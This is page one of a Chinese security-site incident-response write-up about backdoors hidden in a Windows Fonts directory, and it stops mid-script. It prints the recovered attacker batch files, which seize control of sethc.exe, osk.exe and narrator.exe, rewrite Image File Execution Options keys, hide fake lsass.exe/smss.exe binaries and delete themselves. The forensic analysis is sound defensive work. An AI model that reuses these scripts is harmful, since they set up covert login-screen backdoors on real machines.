欢迎来到 黑吧安全网 聚焦网络安全前沿资讯,精华内容,交流技术心得!

记一次应急中发现的诡异事件

来源:本站整理 作者:佚名 时间:2019-06-17 TAG: 我要投稿

0×1 事件概述
在一次应急响应中,无意发现来自不同地区和人员的攻击,两种留后门的方法,截然不同的操作,不同的技术手法。
0×2病毒的温床Fonts
fonts目录常被用于藏匿后门的最佳场所




由于不能直接使用资源管理器进行查看,所以我就选择在dos下打印目录结构进行查看。可以看到这个目录下,有各种各样的“非常规文件”
1.ini-6.ini文件的内容他们是:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe [7]
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe [19]
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe [7]
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe [19]
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\narrator.exe [7]
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\narrator.exe [19]
然后我们继续看该目录下的其他文件
哦买噶的,这个老哥一定是个bat狂魔吧,为什么如此任性。
Aa.bat
>>cloud.inf echo.[Version]
>>cloud.inf echo.Signature = "$Chicago$"
>>cloud.inf echo.
>>cloud.inf echo.[Registry Keys]
>>cloud.inf echo."MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe", 0, "O:BA"
secedit /configure /db cloud.sdb /cfg cloud.inf /log cloud.log
del cloud.*
del %0
Aaa.bat
>>cloud.inf echo.[Version]
>>cloud.inf echo.Signature = "$Chicago$">>cloud.inf echo.>>cloud.inf echo.[Registry Keys]>>cloud.inf echo."MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\narrator.exe", 0, "O:BA"secedit /configure /db cloud.sdb /cfg cloud.inf /log cloud.logdel cloud.*del %0
aodd.bat
takeown /f %SystemRoot%\system32\osk.exe /a
echo y|cacls %SystemRoot%\system32\osk.exe /g Administrators:f
echo y|cacls %SystemRoot%\system32\osk.exe /e /g Users:r
echo y|cacls %SystemRoot%\system32\osk.exe /e /g Administrators:r
echo y|cacls %SystemRoot%\system32\osk.exe /e /d SERVICE
echo Y|cacls %SystemRoot%\system32\osk.exe /e /d "network service"
echo y|cacls %SystemRoot%\system32\osk.exe /e /g system:r
%systemroot%\system32\attrib +s +h +r %systemroot%\Fonts\lsass.exe
call %systemroot%\Fonts\Aa.bat
%systemroot%\system32\regini 3.ini
%systemroot%\regedit /s %systemroot%\Fonts\lsass.reg
del %systemroot%\Fonts\lsass.reg
call %systemroot%\Fonts\Ss.bat
%systemroot%\system32\regini 4.ini
del 3.ini
del 4.ini
@del %sfxcmd%
@del "%0" >nul
aodi.bat
takeown /f %SystemRoot%\system32\sethc.exe /a
echo y|cacls %SystemRoot%\system32\sethc.exe /g Administrators:f
echo y|cacls %SystemRoot%\system32\sethc.exe /e /g Users:r
echo y|cacls %SystemRoot%\system32\sethc.exe /e /g Administrators:r
echo y|cacls %SystemRoot%\system32\sethc.exe /e /d SERVICE
echo Y|cacls %SystemRoot%\system32\sethc.exe /e /d "network service"
echo y|cacls %SystemRoot%\system32\sethc.exe /e /g system:r
@echo cd c\:
%systemroot%\system32\attrib +s +h +r %systemroot%\Fonts\smss.exe
call %systemroot%\Fonts\AS.bat
%systemroot%\system32\regini 1.ini
%systemroot%\regedit /s %systemroot%\Fonts\smss.reg
del %systemroot%\Fonts\smss.reg
call %systemroot%\Fonts\SY.bat
%systemroot%\system32\regini 2.ini
del 1.ini
del 2.ini
@del %sfxcmd%
@del "%0" >nul
AS.bat
>>cloud.inf echo.[Version]
>>cloud.inf echo.Signature = "$Chicago$"
>>cloud.inf echo.
>>cloud.inf echo.[Registry Keys]
>>cloud.inf echo."MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe", 0, "O:BA"
secedit /configure /db cloud.sdb /cfg cloud.inf /log cloud.log
del cloud.*
del %0
sql.bat
takeown /f %SystemRoot%\system32\narrator.exe /a
echo y|cacls %SystemRoot%\system32\narrator.exe /g Administrators:f
echo y|cacls %SystemRoot%\system32\narrator.exe /e /g Users:r

[1] [2] [3] [4]  下一页

【声明】:黑吧安全网(http://www.myhack58.com)登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱admin@myhack58.com,我们会在最短的时间内进行处理。
  • 最新更新
    • 相关阅读
      • 本类热门
        • 最近下载